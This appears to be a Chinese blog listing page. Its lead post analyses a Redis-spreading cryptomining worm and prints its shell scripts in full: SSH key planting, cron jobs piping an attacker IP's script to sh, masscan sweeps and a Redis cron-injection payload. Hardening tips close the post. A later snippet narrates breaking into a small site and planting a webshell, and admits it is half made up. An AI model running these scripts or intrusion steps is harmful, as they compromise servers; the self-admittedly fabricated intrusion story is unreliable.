AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root   yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null   bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null 大致分析一下该脚本的主要用途: 首先是关闭SELinux,解除shell资源访问限制,然后在/root/.ssh/authorized_keys文件中生成ssh公钥,这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多,关于ssh keys的文章可以参考这一篇文章SSH原理与运用。接下来安装bash,最后是继续下载第二个脚本bsh.php,并且执行。   继续下载并分析bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/... sleep 1 if [ -f .watch ]; then rm -rf .watch exit 0 fi sleep 1 echo 1 > .watch sleep 1 ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null sleep 1 if ! [ -x /usr/bin/gpg-agentd ]; then curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db echo '/usr/bin/gpg-agentd' > /etc/rc.local echo 'curl -fsSL 159.89.190.243/ash.php|sh' >> /etc/rc.local echo 'exit 0' >> /etc/rc.local fi sleep 1 chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd sleep 1 if ! [ -x "$(command -v masscan)" ]; then rm -rf /var/lib/apt/lists/* rm -rf x1.tar.gz if [ -x "$(command -v apt-get)" ]; then export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y debconf-doc apt-get install -y build-essential apt-get install -y libpcap0.8-dev libpcap0.8 apt-get install -y libpcap* apt-get install -y make gcc git apt-get install -y redis-server apt-get install -y redis-tools apt-get install -y redis apt-get install -y iptables apt-get install -y wget curl fi if [ -x "$(command -v yum)" ]; then yum update -y yum install -y epel-release yum update -y yum install -y git iptables make gcc redis libpcap libpcap-devel yum install -y wget curl fi sleep 1 curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz sleep 1 [ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4 fi sleep 3 && rm -rf .watch bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/null 这段脚本的代码比较长,但主要的功能有4个: 1,下载远程代码到本地,添加执行权限,chmod u+x。 2,修改rc.local,让本地代码开机自动执行。 3,下载github上的开源扫描器代码,并安装相关的依赖软件,也就是我上面的messages里看到的记录。 4,下载第三个脚本,并且执行。   我去github上看了下这个开源代码,简直吊炸天。 MASSCAN: Mass IP port scanner This is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, > transmitting 10 million packets per second. It produces results similar to nmap, the most famous port scanner. Internally, it operates more > like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is > that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary > address ranges and port ranges. NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause  conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.   transmitting 10 million packets per second(每秒发送1000万个数据包),比nmap速度还要快,这就不难理解为什么阿里云把服务器冻结了,大概看了下readme之后,我也没有细究,继续下载第三个脚本。 setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null sleep 1 rm -rf .dat .shard .ranges .lan 2>/dev/null sleep 1 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'config set dir "/var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "/var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat sleep 1 masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .shard sleep 1 masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .ranges sleep 1 ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet sleep 1 masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .lan sleep 60 rm -rf .dat .shard .ranges .lan 2>/dev/null 如果说前两个脚本只是在服务器上下载执行了二进制文件,那这个脚本才真正显示病毒的威力。下面就来分析这个脚本。 一开始的修改系统环境没什么好说的,接下来的写文件操作有点眼熟,如果用过redis的人,应该能猜到,这里是对redis进行配置。写这个配置,自然也就是利用了redis把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的/root/.ssh/authorized_keys。登录之后就开始定期执行计划任务,下载脚本。好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护,不好意思,你就中招了。 0x03 总结 通过依次分析这3个脚本,就能看出这个病毒的可怕之处,先是通过写入ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过redis漏洞复制,迅速在全网传播,以指数级速度增长。那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。由此可以推断,应该是root帐号被暴力破解了,为了验证我的想法,我lastb看了一下,果然有大量的记录: 还剩最后一个问题,这个gpg-agentd程序到底是干什么的呢?我当时的第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。于是,顺手把这个gpg-agentd拖到ida中,用string搜索bitcoin, eth, mine等相关单词,最终发现了这个:   打开nicehash.com看一下,一切都清晰了。 0x04 安全建议 一、服务器 1,禁用ROOT 2,用户名和密码尽量复杂 3,修改ssh的默认22端口 4,安装DenyHosts防暴力破解软件 5,禁用密码登录,使用RSA公钥登录 二、redis 1,禁用公网IP监听,包括0.0.0.0 2,使用密码限制访问redis 3,使用较低权限帐号运行redis   到此,整个入侵过程基本分析完了,如果大家对样本有兴趣,也可以自行去curl,或是去虚拟机执行上面的脚本。鉴于本人能力有限,文中难免会出现疏忽或是错误,还请大家多多指正。 ...

    2020-04-13 652
  • 不懂代码也能爬取数据?试试这几个工具

    前天,有个同学加我微信来咨询我: “毒蜂,我想抓取近期 5000 条新闻数据,但我是文科生,不会写代码,请问该怎么办?” 有问必答,毒蜂对于这位同学的问题,我给安排上。 先说说获取数据的方式:一是利用现成的工具,我们只需懂得如何使用工具就能获取数据,不需要关心工具是怎么实现。打个比方,假如我们在岸上,要去海上某个小岛,岸边有一艘船,我们第一想法是选择坐船过去,而不会想着自己来造一艘船再过去。 第二种是自己针对场景需求做些定制化工具,这就需要有点编程基础。举个例子,我们还是要到海上某个小岛,同时还要求在 30 分钟内将 1 顿货物送到岛上。 因此,前期只是单纯想获取数据,没有什么其他要求的话,优先选择现有工具。 可能是 Python 近来年很火,加上我们会经常看到别人用 Python 来制作网络爬虫抓取数据。从而有一些同学有这样的误区,想从网络上抓取数据就一定要学 Python,一定要去写代码。 其实不然,毒蜂介绍几个能快速获取网上数据的工具。 1.Microsoft Excel 你没有看错,就是 Office 三剑客之一的 Excel。Excel 是一个强大的工具,能抓取数据就是它的功能之一。我以耳机作为关键字,抓取京东的商品列表。 等待几秒后,Excel 会将页面上所有的文字信息抓取到表格中。这种方式确实能抓取到数据,但也会引入一些我们不需要的数据。如果你有更高的需求,可以选择后面几个工具。 2.火车头采集器 火车头是爬虫界的老品牌了,是目前使用人数最多的互联网数据抓取、处理、分析,挖掘软件。它的优势是采集不限网页,不限内容,同时还是分布式采集,效率会高一些。缺点是对小白用户不是很友好,有一定的知识门槛(了解如网页知识、HTTP 协议等方面知识),还需要花些时间熟悉工具操作。 因为有学习门槛,掌握该工具之后,采集数据上限会很高。有时间和精力的同学可以去折腾折腾。 官网地址:http://www.locoy.com/ 3.八爪鱼采集器 八爪鱼采集器是一款非常适合新手的采集器。它具有简单易用的特点,让你能几分钟中就快手上手。八爪鱼提供一些常见抓取网站的模板,使用模板就能快速抓取数据。如果想抓取没有模板的网站,官网也提供非常详细的图文教程和视频教程。 八爪鱼是基于浏览器内核实现可视化抓取数据,所以存在卡顿、采集数据慢的特点。但这瑕不掩瑜,能基本满足新手在短时间抓取数据的场景,比如翻页查询,Ajax 动态加载数据等。 网站:https://www.bazhuayu.com/ 4.GooSeeker 集搜客 集搜客也是一款容易上手的可视化采集数据工具。同样能抓取动态网页,也支持可以抓取手机网站上的数据,还支持抓取在指数图表上悬浮显示的数据。集搜客是以浏览器插件形式抓取数据。虽然具有前面所述的有点,但缺点也有,无法多线程采集数据,出现浏览器卡顿也在所难免。 网站:https://www.gooseeker.com/ 5.Scrapinghub 如果你想抓取国外的网站数据,可以考虑 Scrapinghub。Scrapinghub 是一个基于Python 的 Scrapy 框架的云爬虫平台。Scrapehub 算是市场上非常复杂和强大的网络抓取平台,提供数据抓取的解决方案商。 地址:https://scrapinghub.com/ 6.WebScraper WebScraper 是一款优秀国外的浏览器插件。同样也是一款适合新手抓取数据的可视化工具。我们通过简单设置一些抓取规则,剩下的就交给浏览器去工作。 地址:https://webscraper.io/ 如果你觉得文章不错的话,分享、收藏、在看是对猴哥的最大支持,是毒蜂持续创作的动力。 ...

    2020-04-12 915
  • 内网穿透

    今天给大家做个内网穿透教程就是让外网用户访问自己电脑的网站 注册宝塔大家应该都有吧 直接打开面板吧看我操作 直接跳过填我们内网IP这个9909端口是我预先设置好的不会设置看我操作这里端口映射直接开端口就行 接下来我们测试一下 现在我们用内网穿透来做外网 内网穿透官网natapp.cn 本地文件看我操作 直接9909端口这个端口可以随便设置必须是数字还有这里的内网IP只能是自己电脑的IP才可以否则不行这个端口得和宝塔面板里的一致 接下来打开内网穿透 复制一下代码  natapp -authtoken=c894d6fc766453a5这个是我的代码authtoken=后面的是不一致的每个隧道都有一个好了我们直接打开平台提供的工具开始穿透 现在可以看到穿透成功了 都是瞎鸡巴扯的大佬勿喷 工具我都传到QQ群方便大家讨论、下载:641912805 ...

    2020-03-26 930
  • 实战用手机拿下代刷网数据库

    由于最近太无聊,就想去康康别人的数据库咋样不过也是拿中小型的开刀,大型的就算了。 准备工具:手机,MT管理器,大马,站长之家,其余的自想,可以带个图片马 顺便找个代刷网 他的域名加上admin康康,嗯。。。 之后用站长之家,查出它的IP 之后我们尝试访问它的主机控制台特别强调本贴针对虚拟主机搭建的东西 众所周知,只要加个端口3312和vhost就可以进入控制面板登录界面 然后咱们康康啊,试着访问这个服务器安装脚本的后台,进不去昂之后操作来重点了,如果需要安装的源码,那么就是加个install,这位小伙子没有警觉性,都不删这个的 试着访问它下方提示的,结果有安装锁 然后试着访问它填的数据库,都知道是config.php,然后咱们康康,结果一片空白 之后就得换方法了咱们康康,诶,这么访问就出来了然后他填了数据库信息,太不谨慎了,这个文件不填也可以安装的咱们试着登录他的主机面板填好,登录,嗯哼 然后不要动里面的源码,先改一下数据库密码。 再偷偷放上个大马玩玩 额。。。好吧其实这篇文章是我闲得慌胡编乱造,半真半假。。。 ...

    2020-03-18 4920
  • 利用Aria2搭建个人磁力下载器

    鉴于国内磁力下载基本被迅雷所掌控,而现今电影版权的一步步收紧,使用迅雷高速下载磁力电影也逐渐成为天方夜谭。影视发烧友们,急需一款高速的磁力下载工具也在情理之中。废话不多说,本文介绍使用Aria2搭建属于你个人的磁力离线下载器。 示意图 所需工具:一台VPS,SSH工具,互联网。(注:文章相关脚本来源于doubi.io) 一,Aria2服务端的准备: 使用SSH工具(如:Xshell等)连接到你的远程VPS。这里需要注意一点问题:使用BT下载电影,美剧等,或多或少都会涉及到版权问题,请购买对于版权监管相对宽松的国家或地区的服务器提供商的主机。如若不此,可能会导致封禁主机或账户,乃至更为严重的行为发生。(虽然本人正在使用美国服务商提供的位于Los Angeles的VPS,下载了大量的BT影片,但仍未产生任何不良后果,故,对于该建议仅供参考。) 切换到管理员账户,粘贴以下代码并运行:wget -N --no-check-certificate https://raw.githubusercontent.com/ToyoDAdoubi/doubi/master/aria2.sh && chmod +x aria2.sh && bash aria2.sh ?按照一键脚本,安装即可。注意,安装完毕后,请保存好第三行的密码。 服务端的搭建使用一键脚本便可以轻松的结束。如果不放心该一键脚本,可以自己编译安装Aria2,官方网址https://aria2.github.io/ 二,Aria2前端的搭建(重点来了) 关于Aria2的前端面板种类很多,这里选用使用人数较多的AriaNG. 1,caddy的安装配置 这一步,通过caddy搭建一个简单的HTTP服务,便可以通过任何网络随时随地访问你的Aria2面板,十分的方便。 2,安装AriaNg 首先我们先安装解压缩依赖 最后一步来咯,输入/etc/init.d/caddy start,启动Caddy,如果提示caddy启动成功,恭喜你,大功告成! 如果显示caddy启动失败,请重试上述AriaNG安装步骤,并检查相关端口占用 三,使用你的Aria2创建BT下载任务。 在浏览器中输入HTTP://你的服务器ip:端口号(如果是使用80端口,端口号可省略),如果没有意外,便可以进入到面板当中。 选择左方的AriaNG设置,可以看见在全局右边有你的ip地址,点击进入,最下方的Aira RPC密钥当中填入第一步搭建Aria2服务端脚本产生的密钥,刷新页面,当左下方状态显示已连接时,便可以爽快的进行下载咯。(不限于磁力下载,各种下载类型均可) 文件将下载到默认地址/usr/local/caddy/www/aria2/Download,配合IDM从服务器端高速取回即可,这可比直接下载种子的速度不知道高到哪里去了。 ...

    2020-03-17 845

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注